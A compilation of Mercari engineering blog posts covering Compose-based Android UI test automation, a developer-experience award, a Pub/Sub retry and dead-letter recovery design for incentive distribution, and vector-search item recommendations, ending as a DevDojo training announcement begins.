Byron Voorbach from Weaviate shared their exciting journey on both keyword and vector search in their talk, "From keyword to vector" which was a gold mine of valuable, practical tips from hard-earned lessons.

Roman Grebennikov & Vsevolod Goloviznin gave in our opinion, one of the most simultaneously entertaining and edifying presentations of the conference, "Learning to hybrid search" which was a fantastic overview of hybrid search and demonstrated why it is likely the best choice in practice, especially in an e-commerce context.

Integrating AI into search is a complex process that requires careful planning, collaboration, and consideration. By continuing to invest in these new search technologies at a consistent pace, we are excited to continue unleashing the potential of AI to provide the best search experience for our users!

Mercari QA and Compose for Android automation

Tue, 20 Jun 2023 19:46:32 GMT

Written by Lester Xie (special thanks to Martin Arellano)

OVERVIEW & PURPOSE

Testing is an essential part of the development process, and Android test automation has evolved over the years. In keeping with the latest trends, Mercari engineering always looks for opportunities to improve. In this article, I will discuss the Compose Framework for automating UI tests and the advantages and some examples of how we use it at Mercari. Previously, our UI tests were written using the Espresso framework. While Espresso is a powerful tool for testing Android UI, it can be quite verbose and difficult to read. Compose, on the other hand, uses a declarative syntax that is more intuitive and easier to read. This means that you can write tests more quickly and with less code.

Compose offers a more intuitive way to write UI tests
Compose’s declarative syntax is more intuitive and easier to read than Espresso’s imperative syntax. Compose allows you to create UI components as functions that take in input parameters and return a UI tree. This makes it easy to test individual UI components in isolation, without needing to navigate through the entire app. With Compose, you can write tests more quickly and with less code, which leads to faster development and more efficient testing.
Compose allows you to test your UI components in isolation
One of the challenges of testing Android UI is that it can be difficult to isolate individual UI components for testing. With Compose, you can create UI components as functions that take in input parameters and return a UI tree. This makes it easy to test individual UI components in isolation, without needing to navigate through the entire app. By testing UI components in isolation, you can catch issues early in the development process and save time and effort in debugging.
Compose offers a more reliable way to test UI changes
One of the common issues with UI testing is that it can be difficult to test UI changes reliably. With Compose, you can use the assert() function to check that your UI components are rendering as expected. This allows you to test UI changes more reliably and catch issues early in the development process. By catching UI issues early, you can reduce the risk of introducing bugs and improve the overall quality of your app.
Compose is faster to execute than traditional UI tests
Another advantage of using Compose for Android test automation is that it is faster to execute than traditional UI tests. This is because Compose UI components are compiled into a tree structure, which can be cached and reused across multiple tests. This means that your tests will run faster and with less overhead. By using Compose, you can save time and effort in testing and improve the overall efficiency of your development process.
Compose offers better support for testability
Finally, Compose offers better support for testability than traditional Android UI frameworks. This is because Compose components are designed to be more modular and testable. You can use tools like MockK to create mock objects for your Compose components, which makes it easier to test them in isolation. By making your UI components more modular and testable, you can improve the overall quality of your app and reduce the risk of introducing bugs.

In this article, I will show some best practices we use at Mercari to showcase ease of use and simplicity.

Example 1

fun goToMyPage() = MyPage.apply {
    composeTestRule.onNodeWithText(R.string.bottom_nav_title_my_page)
        .performClick()
}

R.string.bottom_nav_title_my_page is a string resource for localization defined in strings.xml

<string name="bottom_nav_title_my_page">My Page</string>

This one taps My Page on the bottom menu tab and returns MyPage object.
Where there is a text available on the screen, we can use the text to tap or assert the string.
You can write in this form most of the times:

Example 2

fun tapBack() = TopPage.apply{
    composeTestRule.onAllNodersWithTag("go back")[0]
        .onChildren()[0]
        .onChildAt(0)
        .performClick()
}

This is to click an arrow on the left to go back from item detail page.

Since that has no text, I had to do in the other way to press the arrow button.
In Compose, we can use Semantics which tags a value to use for testing.
Semantics = “the meaning of"; in this case, it gives a meaning to a piece of UI.
I have tagged the arrow as in following:

ItemDetailScreen.kt

topBar = {
    TopNavigation(
        title = stringResource(id = R.string.title_itemDetailFragment),
        navigationIcon = DsIcons.arrowback,
        onNavigationClick = onUpPress,
        modifier = Modifier.testTag("go back")
    )
},

So far, I use 2 ways to tag a value.

Use Modifier
modifier = Modifier.testTag("go back") is something I added so I get the means to click the arrow.
Use contentDescription
```
Thumbnail(
data = item.thumbnails.firstOrNull(),
contentDescription = THUBNAIL_CONTENT_DESCRIPTION,
fadeIn = fadeIn,
)
```
SearchResultScreen.kt
If there is a contentDescription filled, you could use that too.
To specify the target node among all the nodes, define a condition to filter and find the specific node in the tree.

Also, we can use onChildren().onFirst which also gets the first node.
To see the tree node, use composeTestRule.onRoot().printToLog("TAG") which prints the node structure.

Here you can see go back tag and structure-wise, it shows up like this:

This is very readable and allows us to view elements in the tree.
We can tell the node that has Button and OnClick Action is the back arrow.
Just find how you can locate the position relative to other nodes.

You can also view the hierarchy during the test execution by setting a breakpoint and typing the printLog statement in evaluation window.

Example 3

composeTestRule.onNode(
    hasText(R.string.email_login_button) and
        hasClickAction(),
).performClick()

You can also use this style to find a specific node. The above one is telling to click on a node that has a string identified by email_login_button and it also has ClickAction.

Conclusion

In the Mercari QA team, we found this framework smooth as it is native with Android development. As you can see from our examples our code is very readable and easily maintainable. Our developers can read our test code as it is in the same language and technology stack they are using. We are currently utilizing Compose in our release sanity check and running weekly to look for any regressions in our application. I hope you found this article useful and happy hunting. =)

Mercari Ranked #1 in Developer Experience Branding Ranking at “Developer eXperience AWARD 2023” for two years in a row

Mon, 19 Jun 2023 17:00:00 GMT

Hello, this is yasu_shiwaku from the Engineering Office.

On June 14th 2023, Mercari was awarded first place in "Developer Experience Branding” at the Developer eXperience AWARD 2023 conducted by the Japan CTO Association, for the second consecutive year.

A survey was conducted to measure various aspects of “Developer Experience”, and in this particular case "Tech Branding Activity", or how attractive their outputs are to software engineers and other technical professionals. The top 30 companies named in the survey were ranked and each of the selected companies were honored at the Award ceremony of Developer eXperience AWARD 2023.

(* "Developer experience" refers to the overall environment of the company, including technology, team, and corporate culture that enhances productivity as an engineer. Please refer to press release (Japanese) by the Japan CTO Association for the details.)

The Award ceremony was held in-person in Tokyo this year. Mercari’s Group CTO kwakasa commented on the award, and I (yasu_shiwaku) introduced Mercari Group’s Tech PR strategy, policies, and culture in a talk session with other award recipients.

We are pleased to receive high evaluations from many people in the Tech industry in Japan for two years in a row. This is thanks to our engineers who contribute to the technical output on a daily basis, in a wide variety of ways, both internally and externally.

We also contribute to the open source community by supporting conferences and project sponsoring and other various supporting activities (see here for Mercari’s standpoint on open source. The softwares open to the public is here)

Mercari Group has updated its Group mission to “Circulate all forms of value to unleash the potential in all people” to celebrate its 10th anniversary as a company. We will proactively continue to disseminate information to contribute to the development community, in order to circulate the values which our Engineering Organization can provide.

List of Engineering contents platform

Mercari Engineering Website (this portal site)
Twitter (English, Japanese)
Events related
- Connpass
- Meetup
YouTube Channels
- Mercari devjp
- Mercari Gears

If you are interested in what kind of developer experience and culture you can have at Mercari Group, please take a look at our career site!
Software Engineer/Engineering Manager

Resilient Retry and Recovery Mechanism: Enhancing Fault Tolerance and System Reliability

Mon, 19 Jun 2023 10:00:44 GMT

This article is from Day 10 of Merpay Tech Openness Month 2023.

About me:

Hello, Tech Enthusiasts!

Greetings from a passionate techie and an aspiring blogger (though this is my first blog post)!

I introduce myself as Amit Kumar, a software backend engineer at Mercari Inc.
My expertise lies in architecting/designing/implementing/testing/deploying/maintaining scalable and distributed systems. I’ve been edging my skills through hands-on experience, continuous learning, and a deep interest in solving complex technical challenges. You can find more detail about my expertise from my LinkedIn profile.

Knowledge needs to be shared, and that’s precisely why I’ve chosen to write this blog post. Through this blog post, I aim to bridge the gap between the complex technical challenges for everyday engineers.
My goal is to make engineering simple and leverage different ways to make the technology accessible and empower engineers to leverage it effectively according to their use case.
I aim to provide valuable insights, practical solutions, and thought-provoking discussions in this dynamic realm of engineering.

Introduction:

Mercari uses various strategies to engage and retain users of the Mercari app. One such approach is incentivising users by granting incentives.
Mercari has an internal platform called Engagement Platform (EGP), which handles the whole incentivisation process. EGP consists of various microservices, and each microservice plays a significant role on its own and helps:

To define the list of users, we need to incentivise.
When the user will receive the incentives.
How to be incentivised, i.e. by Mercari coupon or Mercari points or other mechanisms.
How often will users be incentivised depending on the campaign participation rules?
Notify users about the incentives received, i.e. using in-app, push notifications or private messages, etc.

The system incentivises users in real-time or batch. In “real-time”, upon completing the campaign actions, the users receive incentives. In the “batch”, users are evaluated and incentivised based on past actions. Hence, the scale or the amount of requests handled by the EGP system is very high. We need to process millions of requests per day.

Background:

For us, incentivising the users with 100% accuracy and on time is the objective, and it’s not as easy as it sounds.
During the incentivisation process, the system goes through various possible points of failure, and any failure could affect us in two ways:
Failures to distribute incentives correctly would mean a financial loss to Mercari.
If the user doesn’t receive the incentive for his defined action, then we will have an unhappy customer, and thus the whole objective of the engagement platform is at stake.

In modern distributed systems, ensuring high availability and reliability is paramount. Inevitable intermittent failures and transient errors can pose significant challenges to systems. It is necessary to make the system resilient to mitigate the impact of distribution failures during incentivisation. We achieved it by implementing automated retry and recovery mechanisms.

This blog post will discuss how we made EGP fault-tolerant and improved its reliability by designing and implementing a resilient retry and recovery mechanism.

Please enjoy reading it 👍

Challenges Faced:

Before 2021, Mercari had a legacy tool called Ptool, which distributed Incentives. Ptool was a monolithic application; over time, it started to get into many technical constraints. Also, at the same time, it wasn’t scaling to our needs to incentivise more users and be fault tolerant. Hence, the circumstances led us to build a new tool called Engagement Platform based on microservices architecture.
We designed EGP as a common platform for the Mercari Group, including Mercari Marketplace, Merpay (Fintech) and other subsidiaries of Mercari for the entire Japan region.
With Mercari group having more than 20 million monthly active users, designing a system to handle millions of users was necessary and challenging.
Along with being able to scale to handle millions of users, the system also needed to achieve 100% accuracy in incentive distribution by ensuring that:

We distribute incentives to the users according to the campaign criteria.
All the users should be able to receive the incentives.
The system should have the ability to keep track of all the events and can regenerate the same event.

The architecture of EGP

Once the MVP was created and deployed to production, we ran some campaigns and obtained good results. It was time to migrate traffic from ptool to the EGP.
We, as developers, were quite confident that this wouldn’t result in any of the failures we discussed above (developers are always right, right? 😂).

But to avoid distribution risk for the millions of users, we devised the test case and started deep diving into the code to find the failure points (plant UML helped us understand the event flow in our code).

From the architecture diagram, we can see that most of the services are async services. However, as the event moves closer to the incentivisation part, it reaches a service called Incentive Hub which consumes asynchronous events and makes synchronous requests.
Incentive Hub is a critical service responsible for receiving and processing events to distribute incentives to the user.

We started identifying various problems around this service based on our use case.

Here is the part from the architecture diagram around which we had concerns.

Some of the concerns are listed here:

Data Loss:

Incentive events are only generated once. If we fail to incentivise a user, we must take extra measures manually to incentivise the user.
Also, when we failed to incentivise the users, even though we saved the event details in the database, addressing the cause of failure and reprocessing those events in the pubsub topic with the same message structure was complicated. And while we fix the cause of failure, the failed event will keep replaying because of the nature of the pubsub.
When we receive the events from pubsub and cannot save it to DB before processing them for incentivisation, it could also result in data loss.
In any situation, if the system crashes at any point, the processed message could be lost.

In GCP Pub/Sub default behaviour, when an event is NACK-ed by the application explicitly or if we fail to ACK an event within a certain duration (this could happen because the process that pulled the event got terminated for some reason), the event will be republished to Pub/Sub.
Republishing an event to the Pub/Sub when there is a lack of acknowledgement is a sensible behaviour, it means that the message was not processed properly and we might want to reprocess it again.

But it could lead to dangerous problems if not planned properly: reprocessing an event could lead to duplicate distribution of incentives.
This would incur unwanted financial damage to the company.

In summary, the system could distribute duplicate incentives or none when data loss occurs. Impacting the company’s finances in those ways was unacceptable.

There are 2 systems properties that could help to solve these issues:

Idempotency:

We must ensure idempotency and prevent duplicates for these critical systems. We were able to identify some gaps here too.
Also, it is not only essential to make one service idempotent. It required all upstream (caller) services to be idempotent to ensure the system’s idempotent.

Consistency:

With multiple read/write happening for one event, we must ensure data consistency in our database.
(I’ll not write about this situation in this blog post as it’s a different topic. But for highlight, we ensured the spanner ReadWrite transactions are in place in our system and validated it using Load tests.
You can read more about Cloud Spanner transactions here)

Strategy and Implementation:

Well, now we have the problem definition in hand and know the root cause of those problems. So it was time to work on the solutions.

Solutions? What could it be? From where to start?
As a software developer, I have a theory that you need to start by writing the main(), and then the rest of the code will automatically get written…lol you will just be able to find the next line of code, which you need to write 😀

The pubsub system will replay (retry) the events when the failure occurs. If we continue replaying the failed events, it could lead to inconsistent services and duplicate distributions.
It was clear that we needed Retry, but to avoid extra distribution because of replaying the messages, we need our system to be idempotent.

Ok! So now, when I can retry the messages, and if my system is idempotent, then we can say that no duplicate distribution would happen. Very nice 👏

How many times to retry?
GCP Pubsub keeps on replaying the event until it is ACKed.
We cannot afford to keep retrying the message even though we know it won’t succeed in case of any issue in the system.
Also, even if the problem was intermittent, like a network issue, we cannot keep on retrying as in all situations, as sending the failed messages to the pubsub topic, there was a risk of creating a mini-DoS attack on self or upstream services. In addition, new events are also coming on the pubsub topic.
So, to overcome this situation, we have to limit the maximum number of retries. Five retries (depending on your use case) could be sufficient; add some exponential back-off and jitter, and with all these, we have a retry mechanism that won’t be stuck in a loop.

Is that all 😣?
We have events failing and retry them for some defined maximum number of times. What do to do after the maximum number of retries? Can we analyze them later? Ohh, yes, let’s recover those failed messages later.

Above was the thought process that followed when trying to find the solution to the problem. And your solutions mustn’t become your system’s new problem.

So, now I’ll write about how we designed and implemented all our thought processes to make our system resilient and consistent and one of the significant steps taken to address the issue of scalability and 100% accuracy.

Idempotency:

The first thing we needed in our system was Idempotency. Idempotency will be the baseline for the strategies we have discussed above.

What is Idempotency:
The system must consistently return the same output for the same input.

Users will receive the incentive only once if the same event is sent more than once on the pubsub topic.
Hence, we need an idempotency key (unique identifier) for every event, which is standard across the system and available with all the microservices in the EGP platform. It would also help us trace our events anywhere in the system.

How we ensure idempotency:
We can do various things to ensure idempotency. But we keep the implementation according to our system’s needs.

As the event is received, generate a unique key and attach it with the event request to identify it during the incentive distribution uniquely.
We need to store the event details and the idempotency key.
1. Before storing the event details along with the idempotency key, ensure that the event with the given idempotency key doesn’t already exist in the system.
  1. If it doesn’t exist, save the event details and perform further operations.
  2. If the event exists, fetch the event details and perform additional functions.

These two steps will ensure that event processing will happen only once, even if the same event is replayed more than once by the pubsub system.

Retry:

GCP Pubsub keeps delivering the event to subscribers until the event is ACK-ed. We had the same situation in case of event failure.
We had two problems because of this:

The same message is getting subscribed multiple times and can cause a mini Dos attack on the system.
If we ACK a events upon error without persisting it somewhere else, the message will disappear and it may lead to data loss..

Here is what we did to overcome these situations:

To limit the replay of the events, we leveraged GCP pubsub configurations to the subscriber upon how many times a message can be NACK-ed.
We set the value as 5 (depending upon the use case).
It helped us retry all the failed messages and re-evaluate them automatically. The events that failed initially because of transient issues could lead to the successful distribution of incentives during one of the retries.
We retried the failed events with some exponential back-off (progressively increasing the interval between consecutive retry attempts) and added jitter (randomisation) values.
Adding randomisation (jitter) to the exponential backoff strategy helps to avoid synchronized retries and distributes the load on the system during recovery periods. Randomized delays reduce contention and increase the chances of successful retries.
We leveraged the concept of dead letter queues.
We created a Dead Letter Topic associated with the main Pub/Sub subscription. So, if any event fails, it is retried a maximum of 5 times, and then if it doesn’t succeed on the 5th attempt, it will be sent to DLQ. Hence, this helped remove the failing events from the main pubsub topic and send them to DLQ.

DLQ can be set up easily and cost the same as initializing a Pub/Sub topic.

Since GCP pubsub manages the Retry and DLQ, the chances of failures were meager as their SLA uptime was >=99.95%.

Outcome:

We could control the number of retries of the failing events.
We are not worried about retrying multiple times as we already have idempotency.
The accuracy increased because failing events without retry meant lower distribution accuracy. Because of retry, processing failed messages resulted in successful distributions and improved accuracy.
Failed events are removed from the system and preserved on a separate dead letter topic.
Also, any new event is coming to the main pubsub topic, and, for some reason, our system is down or going through some issues. In that case, we don’t have to worry because that event will remain the main topic. Hence, our data loss issue got addressed with this.

Recovery:

Messages that have failed 5 times end up in the DLQ.
To improve our distribution accuracy, we can analyze the reason for the failure of these failed messages by looking at the logs and metrics from our observability and monitoring tools (for us, it’s Datadog).

For reprocessing the same event, we created an Error Worker responsible for saving the failed events that ended up in the DLQ into a DB (called Error DB) so we could keep a persistent trace of it. While committing to Error DB, the Error Worker ensured that information such as idempotency key and the original JSON data of the event were persisted.

By persisting all the failures in a proper DB we can now develop one or several auxiliary components that would be specialized into digging in those failures and perform various tasks like failures reporting, alerting or attempting recovery.

To recover the failed events, we created a job and scheduled it to run at a desired time daily. When required, we could also invoke the job manually using a pipeline. We called this as Recovery Scheduler.

The responsibility of the Recovery Scheduler is to attempt various recovery attempts on the failed events stored in the Error DB. The Recovery Scheduler can process a row from the Error DB and depending on the reason of the failure can execute a dedicated process to attempt a recovery.

For example if the failure was due to one of our upstreams being unavailable for a period long enough and our retry mechanism was not enough. We could imagine that retrying the message once the upstream is back online could recover this event..

That’s why re-sending the message is one of our recovery systems. If we detect a failure likely due to a network error. Recovery Scheduler could decide to re-send the message with its original payload to its original topic several hours after the initial failure when it is likely to succeed. We could even have the Recovery Scheduler check the health of the upstream before attempting the re-sending.

By having such mechanisms in place, our system is able to recover some failures by itself without manual intervention and thus increasing the accuracy of the distribution.

As I mentioned earlier, your solution shouldn’t become your next problem. When the Recovery Scheduler attempts to recover failures, it could start re-sending many events to the original topic. If the system is already going through high traffic and the Recovery Scheduler sends more records, it could cause a mini DoS on our system. It could impact the current state of our services or any upstream services.
To handle this situation, we have added Rate-Limiting, but I’ll not write about it in this blog post.

End-to-end (E2E) Event Monitoring System:

Our E2E monitoring is a vast system, but I would like to mention it here as it helped to monitor our events from source to destination (outside EGP) and ensure that we haven’t missed incentivising any user.

It monitors various systems across the company to create user-friendly failures reports as there is a need for our Project Managers (PMs) and Marketers to be notified about failures to incentivize users.

When such failures happen and are not resolved automatically by EGP systems, PMs and Marketers can decide to take action by contacting our Customer Service (CS) team or can recover those failures manually with various processes (like a manual distribution of incentive targeted at the users who failed to get incentivized).

As such receiving timely reports of failures with the number of users not being incentivized so we can react and resolve these failures is vital for our brand reputation.

EGP systems have different mechanisms to notify about failures to incentivise the users, but their reports are too technical and aimed at engineers. Also, those failure notifications are local to each microservices; hence, it is difficult to have a consolidated overview.

I won’t get into details here, but I would mention that E2E monitoring is one of the backbones of the EGP system.

Here is how our architecture evolved to address these concerns around the Incentive Hub MicroService.

Conclusion:

Our experiments demonstrate the effectiveness of our proposed Retry and Recovery Mechanism in achieving high system availability, handling millions of requests in a day, minimizing data loss, ensuring consistency, and overall boosting distribution accuracy.

Also, I have a short story to share here, which I read on LinkedIn sometime back.

There were three friends, and they had two apples and a knife. They all wanted to eat equal amounts of apples but with only one knife stroke.

There are multiple ways to do it:
1. Line the apples up at a two-thirds offset, and cut through them both with one slice. You’ll end up with two large pieces, each of which go to one person, and two small pieces, both of which go to the third person.

2. Put the two apples together and cut them in half. You get four pieces, give 1 piece to each, and offer the last to someone else.

While 2. doesn’t maximize the apples given to the 3 people, it was never mentioned it had to be.

Engineering is like this; It’s not complex if we can select the right solution depending on our requirements and use cases.

Feedback:

I’m here to learn and grow with you. Your input is invaluable, and I encourage you to join the conversation by sharing your insights, experiences, and even constructive criticism. Together, we can create a vibrant tech community.

Closing Note:

Once again, welcome to Mercari Engineering blog post. I hope you find the content informative, engaging, and thought-provoking. Let’s explore the vast possibilities of technology and embark on this adventure together!

Tomorrow’s article will be by @katsukit. Please look forward to it!

Improving Item Recommendation Accuracy Using Collaborative Filtering and Vector Search Engine

Mon, 12 Jun 2023 11:00:53 GMT

Hello, I am ML_Bear, an ML Engineer in the Mercari Recommend Team. In a previous article [1], I talked about improving Mercari’s home screen recommendations using item2vec and item metadata. This time, I will talk about improving recommendations on the item details screen. An example of the item details screen can be seen in figure 1. This screen is displayed to the user every time they want to see a detailed description of an item, which makes it a natural touch point to recommend similar items.

To make these improvements, we did the following:

Implemented a vector search-based recommendation algorithm in one of Japan’s largest EC services, significantly improving recommendation accuracy.
Successfully utilized user browsing history by constructing a recommendation algorithm using collaborative filtering and NN, avoiding the cold start problem.
Accelerated extensive behavior user-browsing-log calculations using the Python implicit library and GPU during collaborative filtering learning.
Created a lightweight NN model, partially referencing solutions from Kaggle competitions.
Ensured continuous improvement by conducting offline evaluations using user-browsing-log in modeling.
Adopted the VertexAI Matching Engine for our vector search engine, enabling efficient vector searches with a small team.
Actual A/B testing led to the discovery of important features overlooked during NN modeling. After the initial test failure, we quickly corrected it and completed a powerful recommendation model contributing to the actual business.

Next, Iwill talk about some of the challenges we faced.

Figure 1. Target of this story: "Recommended for those who are viewing this item" (この商品を見ている人におすすめ)

Utilizing a vector search engine in Mercari

As introduced in the article [2] written by wakanapo last year, Mercari Group is trying to improve recommendation accuracy using vector search engines. The previous article was about improving recommendations for Mercari Shops items, but in this article, I will introduce an attempt to improve recommendations for all items listed on Mercari.

We adopted the Vertex AI Matching Engine [3] (the Matching Engine) for the vector search engine. We chose it because other teams have already been using it (allowing us to reuse some of their code and their operational know-how), and because it can withstand high access loads, as we will discuss later.

Item recommendation using vector search engine

The item recommendation system we built this time recommends items using the following flow. I will explain the details later, but here’s the basic idea:

(The numbers in parentheses correspond to the system architecture overview.)

Indexing
- Calculate the item vector by some method (i, ii, iii)
- Store the item vector in the following two GCP services (iv)
  - Bigtable [4]: Save all item vectors
  - Matching Engine: Save vectors of items for sale
Recommendation
- When a user views an item (1), recommendations are made using the following flow.
  - Retrieve the vector of the item being viewed from Bigtable (2, 3)
  - Use Matching Engine to search for items for sale with similar vectors, using approximate nearest neighbor search. (4, 5)
  - Display the search results of Matching Engine in "Recommended for those who are viewing this item" (この商品を見ている人におすすめ) (6)

Figure 2. System Architecture Overview

Initially, Matching Engine could only accept vectors as queries and return similar item IDs. This is why the Item index mapping in Bigtable (2, 3) is needed. Later improvements to Matching Engine removed the need for the mapping, as Matching Engine could now accept vector id directly.

We also adopted Streaming Update [5] for creating the Matching Engine index. I will not go into the details here, but with this method we can instantly reflect the addition of newly listed items to the index and the removal of sold-out items from the index. This was a very convenient feature for Mercari, where item inventory changes at an incredible pace.

The first A/B test targeting the toys category

The inventory on Mercari is huge with hundreds of millions of items for sale, and over 3 billion items listed in total [6]. Since the "Recommended for those who are viewing this item" part needs to be displayed even for sold-out items, we need to calculate vector embeddings for sold-out items as well.

To validate our hypothesis more quickly, we decided to focus on a specific subset of our inventory. If initial experiments work well, we could then expand it to the full item inventory. In this specific case, we decided to start with the toys category.

We selected the toys category first for the following reasons:

The trends for items in this category changes very quickly, which results in our current recommendation logic not working very well. For example, when new characters were introduced in a TV show, unrelated items were being recommended when searching for the new characters. This was because we could not keep up with these additions, as well as new items related to them.
The toys category contained several sub-categories with high sales volumes such as trading cards. We could expect improvements in recommendations to contribute to sales.

Utilizing collaborative filtering

For the modeling, I decided to use word2vec [7] for the baseline mode, as it was also used during work for improving Mercari Shops items. However, the metrics of offline evaluation (MRR: Mean Reciprocal Rank) did not perform well with word2vec when dealing with a very large number of items, and the recommended results did not look very good to our eyes either. Specifically, it seemed like subtle differences between items were being ignored as the number of items became large.

I also tried using a word2vec trained using our own dataset, but the accuracy did not improve as much as I expected. After some trial and error, I decided to use a more classical collaborative filtering.

Specifically, I used the Python “implicit” library [8] to calculate the factors of items from user browsing logs. The “implicit” library can accelerate calculations using GPUs, so it can complete calculations in a realistic time even if you put in billions of rows of data. In addition, it supports differential updates, so you can update to more sophisticated vectors as the item browsing history accumulates.

This library turned out to be extremely beneficial for Mercari, which has a huge amount of user log data and item data, but there were two problems.

The handling of logs in the implicit library is very complicated
- Due to the constraints of the library, data must be handled with IDs starting from 0, and it requires a conversion table between implicit IDs and item IDs.
Cold start problem
- Due to the nature of the marketplace app service, new items tend to attract more views. If the "Recommended for those who are viewing this item" does not work well for new items, it will negatively affect the user experience.
- (However, this is a problem with the collaborative filtering method itself, not just the implicit library.)

To solve these, just before the A/B test, we tested the following model changes.

Calculate the vector (factor) of items with sufficient item browsing counts using collaborative filtering
Train a neural network model (NN model) that reproduces the vector using item information such as title and item description
Calculate the vector for all items in the toys category using the NN model and use it as the item vector.

I will skip over the details of the implementation of the NN model because it would make this post too long, but basically, I built a simple model with the following configuration. (We did not use heavy models such as BERT in the first test because we had to process tens of millions of items.)

Figure 3. NN Model Architecture (simplified)

During string processing, we referred to some of the solutions of the Mercari Kaggle competition [13] (like processing the item title and category name together).

After a lot of work, I ended up having to approximate the collaborative filtering factors with a neural network. Other models such as two-tower models may have been more effective. We plan on trying this another time.

Recommending new items as much as possible

The first A/B test did not work out too well. Fortunately, we were able to quickly identify the cause of the failure and conduct a second A/B test, which was successful, so we were able to avoid further problems.

The reason for the failure was that we were recommending too many items that had been left unsold for a long time after being listed.

As I mentioned earlier, the item vectors were mainly generated using item information such as titles and descriptions, without considering when the items were listed (freshness). We later realized that when conducting offline evaluations, we only used data from specific periods, so the lack of consideration for freshness did not manifest itself as a problem during the modeling. As a result, we did not notice that we needed to consider the freshness of the items until the first A/B test.

After modifying the recommendation logic to consider the freshness of the items, the purchase rate of the recommended items improved significantly, leading to the overwhelming numerical improvements which I will talk about at the end of this article.

Other challenges

This was our first use of the Matching Engine at this scale. We encountered several issues while deploying in production. Some highlights:

We were not able to find everything we needed in some of the documentation (how to use the SDK, how to configure the public endpoint, etc.), though the Google Cloud team was quick to answer our questions.
There were occasional times when we could not get a GPU at all with GKE’s node auto-provisioning (NAP) [12], possibly due to a shortage of GPU resources in the Tokyo Region. In the end, we gave up on NAP and set up an instance to always keep a GPU. (I wonder if this is due to the rise of image generation AI…)

Improvement results: Item recommendation tap rate tripled

Now, as a result of the modeling described so far, we have achieved the ability to make the following recommendations. Previously, we were not effectively recommending related items when users were browsing items related to new characters. However, by adopting the approach presented this time, we were able to overcome this weakness.

Figure 4. Successfully making recommendations (The numbers in parentheses indicate the recommended order.)

Browsing item: ちいかわワクワクゆうえんち Pouch

Before improvement (many unrelated to “ちいかわ”):

[1] ハイキュー Art Coaster Bulk Pack
[2] 呪術廻戦0 TOHO-Lottery H-Prize Sticker...
[3] ちいかわ Mascot with Dialogue ハチワレ Prize Item
[4] 美少女戦士セーラームーンR S カードダス アマダ
[5] プロメア ガロ＆リオ SGTver. Special Box PROMARE
[6] 宇宙戦艦ヤマト 2205 新たなる旅立ち Keychain Set
[7] Doraemon Wallet with Strap and Pass Case
[8] [New & Not for Sale] 日本食研 バンコ Plush Toy
[9] Pocket Monsters メイ EP-0137 Bath Towel Size...
[10]ちいかわワクワクゆうえんち Limited Edition Towel Set

After improvement (recognizing “ちいかわワクワクゆうえんち”)

[1] ちいかわ ワクワクゆうえんち 2-Piece Set Pouch Jet Co...
[2] ちいかわ ワクワクゆうえんち Pouch
[3] ちいかわワクワクゆうえんち Limited Edition Towel Set
[4] Anonymous Delivery ちいかわワクワクゆうえんち Gacha Ax…
[5] ちいかわ ワクワクゆうえんち Mug Cup
[6] Anonymous Delivery Unopened New ちいかわ ワクワクゆうえんち Mascot...
[7] ちいかわ ワクワク ゆうえんち Side Plate
[8] ちいかわ ワクワクゆうえんち Mini Frame Art ハチワレ
[9] ちいかわ ワクワクゆうえんち Mascot Set
[10] ちいかわ ワクワクゆうえんち 2-Piece Set Pouch

(For copyright reasons, I will not upload images here, but you can see the results yourself by looking up items on the app.)

As a result of the A/B test, we were able to achieve the following great results.

The tap rate for items under "Recommended for people viewing this item" tripled
Purchases from "Recommended for people viewing this item" increased by 20%
As a result, the Mercari app’s overall sales increased significantly.

Of course, it’s great that the business metrics have improved, but more importantly, we were able to properly recommend items more strongly related to the items users are viewing, and we were proud of that as a team.

There’s still room for improvement

I had a lot of information to present, and the detailed explanations for each section ended up being very concise, but I hope this served as a helpful reference for you.

This time the model design itself was very simple, as it was the first test of vector search item recommendation for all of Mercari. We have not considered images yet, and we have not used advanced features of the Matching Engine (such as the Crowding Option [14] for diversity).

In addition, we have not yet applied this model to categories other than toys, so there is still room for improvement. We will continue to make improvements and evolve the service to be better.

Let me know if you have any opinions or impressions on Twitter or elsewhere.

See you again!

References

[1] Attempt to improve item recommendation accuracy using Item2vec | Mercari Engineering
[2] Vertex AI Matching Engineをつかった類似商品検索APIの開発 | メルカリエンジニアリング
[3] Vertex AI Matching Engine overview | Google Cloud
[4] Cloud Bigtable: HBase-compatible NoSQL database
[5] Update and rebuild an active index | Vertex AI | Google Cloud
[6] フリマアプリ「メルカリ」累計出品数が30億品を突破
[7] [1301.3781] Efficient Estimation of Word Representations in Vector Space
[8] GitHub – benfred/implicit: Fast Python Collaborative Filtering for Implicit Feedback Datasets
[9] [1408.5882] Convolutional Neural Networks for Sentence Classification
[10] [1805.09843] Baseline Needs More Love: On Simple Word-Embedding-Based Models and Associated Pooling Mechanisms
[11] MeCab: Yet Another Part-of-Speech and Morphological Analyzer
[12] Mercari Golf: 0.3875 CV in 75 LOC, 1900 s | Kaggle
[13] Use node auto-provisioning | Google Kubernetes Engine（GKE）
[14] Update and rebuild an active index | Vertex AI | Google Cloud

New Materials and Videos from Mercari’s 2023 DevDojo Now Available!

Fri, 02 Jun 2023 14:14:41 GMT

Hi! I’m @aisaka from Mercari’s Engineering Office.

Mercari’s engineering organization fosters a culture of mutual learning and growth, always striving to create an environment where our members can learn from each other, freely take on bold challenges, and grow.

DevDojo, a series of in-house technical training programs, is just one example of how we promote and maintain this culture.
Since last year, we have been releasing portions of our DevDojo series externally (click here for details), and now we have decided to release even more new DevDojo content!

Today’s blog post will give you a brief intro to the sessions that are now open to the public, as well as an overview of the specific content.

Learning materials Website

What is DevDojo?

DevDojo is a comprehensive in-house training series that is meant to help participants improve their technical skills. As you may have guessed, the name “DevDojo” is derived from a combination of the words “development” and “dojo” (the Japanese word for a place of training or learning, especially Judo or other martial arts)."

The content that makes up the series is diverse and packed with the knowledge and ideas of Mercari and Merpay engineers. An overview and summary of the entire training program can be found here.

The program is held in April and October of each year. The April sessions usually coincide with a period when new grads join the company, and this year there were lots of new grads joining, so it was a particularly great session!

DevDojo is open to any member of the company, not just engineers, and this time we got about 50 participants from all across Mercari Group.

Here is what we’re making public!

More than half of Mercari’s engineering organization is made up of employees hailing from outside of Japan. With this in mind, we have adjusted our DevDojo lessons to be taught half in English and half in Japanese.

The Global Operations Team, an in-house team of language service experts who provide translation and interpretation internally at Mercari, also makes their services available to provide simultaneous interpretation at all DevDojo lessons.

For this content, we have already released recordings of the lessons being taught in the original language (whether that be Japanese or English)

Now, without further ado, let’s take a look at the new content!

Introduction to Machine Learning

